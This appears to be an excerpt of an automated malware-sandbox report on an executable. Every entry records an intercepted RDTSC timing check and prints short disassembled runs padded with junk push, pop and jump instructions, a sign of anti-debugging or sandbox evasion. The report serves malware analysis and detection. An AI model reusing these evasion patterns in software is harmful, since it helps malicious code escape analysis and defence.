                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118593D second address: 1185943 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185943 second address: 1185949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185949 second address: 1185957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EAh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185957 second address: 1185965 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1185965 second address: 1185969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1188CFB second address: 1188D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1188D03 second address: 1188D21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11886C1 second address: 11886D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151BDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11886D2 second address: 11886D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11886D6 second address: 11886DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118894B second address: 118895A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118895A second address: 1188964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD09CF151B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118E4FF second address: 118E509 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118E509 second address: 118E54C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD09CF151BCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FD09CF151C0h 0x00000012 jmp 00007FD09CF151BFh 0x00000017 push eax 0x00000018 pop eax 0x00000019 jmp 00007FD09CF151BEh 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118EB7B second address: 118EB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FD09CB0C7F7h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118EEF4 second address: 118EEFB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118EEFB second address: 118EF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118F687 second address: 118F68D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 118F68D second address: 118F6D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a jns 00007FD09CB0C7E6h 0x00000010 popad 0x00000011 jne 00007FD09CB0C7EEh 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a jmp 00007FD09CB0C7F8h 0x0000001f pop ecx 0x00000020 pushad 0x00000021 jng 00007FD09CB0C7E6h 0x00000027 pushad 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11987A0 second address: 11987A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198911 second address: 119894A instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD09CB0C7FDh 0x00000008 pushad 0x00000009 jmp 00007FD09CB0C7F7h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119894A second address: 1198950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198BF9 second address: 1198C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD09CB0C7F7h 0x0000000c jo 00007FD09CB0C7E6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198C1D second address: 1198C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1198FCA second address: 1199011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F2h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jmp 00007FD09CB0C7F7h 0x00000010 pop eax 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FD09CB0C7E8h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD09CB0C7EAh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1199011 second address: 1199017 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1199017 second address: 119903C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CB0C7ECh 0x00000009 jmp 00007FD09CB0C7F5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F298 second address: 119F2A2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2A2 second address: 119F2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FD09CB0C7EDh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2B8 second address: 119F2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD09CF151BAh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2CB second address: 119F2EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F7h 0x00000007 jne 00007FD09CB0C7E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F2EC second address: 119F2F1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F413 second address: 119F45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD09CB0C7E6h 0x0000000a pushad 0x0000000b jmp 00007FD09CB0C7ECh 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 js 00007FD09CB0C7E6h 0x00000018 jns 00007FD09CB0C7E6h 0x0000001e popad 0x0000001f jno 00007FD09CB0C7EEh 0x00000025 popad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FD09CB0C7EAh 0x0000002e jg 00007FD09CB0C7E6h 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F45B second address: 119F498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD09CF151C7h 0x00000010 jmp 00007FD09CF151C5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F793 second address: 119F799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119F799 second address: 119F7D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151BFh 0x00000009 jmp 00007FD09CF151C9h 0x0000000e popad 0x0000000f jmp 00007FD09CF151BBh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119FC0C second address: 119FC16 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119FD75 second address: 119FD80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD09CF151B6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119FD80 second address: 119FD95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD09CB0C7F0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1026 second address: 11A1031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007FD09CF151B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1031 second address: 11A1037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1037 second address: 11A103F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A103F second address: 11A1045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A1045 second address: 11A1050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119EE90 second address: 119EE94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 119EE94 second address: 119EEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A83AF second address: 11A83EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7EDh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jns 00007FD09CB0C7F2h 0x00000013 jmp 00007FD09CB0C7F0h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11A83EA second address: 11A83EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B41FC second address: 11B421C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD09CB0C7F6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B421C second address: 11B4222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B4222 second address: 11B4226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B4226 second address: 11B422A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3BDD second address: 11B3BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 ja 00007FD09CB0C811h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3BED second address: 11B3C07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11B3D43 second address: 11B3D4D instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD09CB0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B3D4D second address: 11B3D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B3D5A second address: 11B3D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD09CB0C7E6h 0x0000000a jnl 00007FD09CB0C7E6h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B3D70 second address: 11B3DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C9h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007FD09CF151B6h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FD09CF151BCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B9336 second address: 11B9346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FD09CB0C7EAh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B9346 second address: 11B934C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B8EAB second address: 11B8EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B901F second address: 11B902B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD09CF151B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B902B second address: 11B902F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11B902F second address: 11B9066 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD09CF151C7h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11C09B4 second address: 11C09BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11C09BD second address: 11C09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10E070B second address: 10E0711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10E0711 second address: 10E072C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11C894B second address: 11C8951 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11C8951 second address: 11C8955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D24B7 second address: 11D24C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jp 00007FD09CB0C7E6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D24C5 second address: 11D24FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FD09CF151B6h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push edx 0x00000012 jmp 00007FD09CF151C2h 0x00000017 jmp 00007FD09CF151BCh 0x0000001c pop edx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D24FC second address: 11D2517 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD09CB0C7F6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D28F3 second address: 11D28F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D28F7 second address: 11D290B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FD09CB0C7E8h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D290B second address: 11D290F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D2A7A second address: 11D2A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D2A80 second address: 11D2A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D2A86 second address: 11D2A8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D394B second address: 11D3950 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D3950 second address: 11D3994 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F9h 0x00000009 pop edx 0x0000000a jl 00007FD09CB0C7ECh 0x00000010 jl 00007FD09CB0C7E6h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD09CB0C7F6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D3994 second address: 11D399E instructions: 0x00000000 rdtsc 0x00000002 js 00007FD09CF151BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D52CB second address: 11D52F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD09CB0C7E6h 0x00000008 jmp 00007FD09CB0C7F8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FD09CB0C7E6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D52F5 second address: 11D52F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D7D70 second address: 11D7D92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD09CB0C7F2h 0x0000000c ja 00007FD09CB0C7E6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D7D92 second address: 11D7D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D7D9A second address: 11D7DCE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FD09CB0C7F8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007FD09CB0C800h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD09CB0C7EAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D7DCE second address: 11D7DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11D99EE second address: 11D99FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FD09CB0C7E6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E2925 second address: 11E292B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11E292B second address: 11E295E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FD09CB0C7F5h 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jns 00007FD09CB0C7E6h 0x00000015 pop ebx 0x00000016 jnp 00007FD09CB0C7F2h 0x0000001c jnp 00007FD09CB0C7E6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
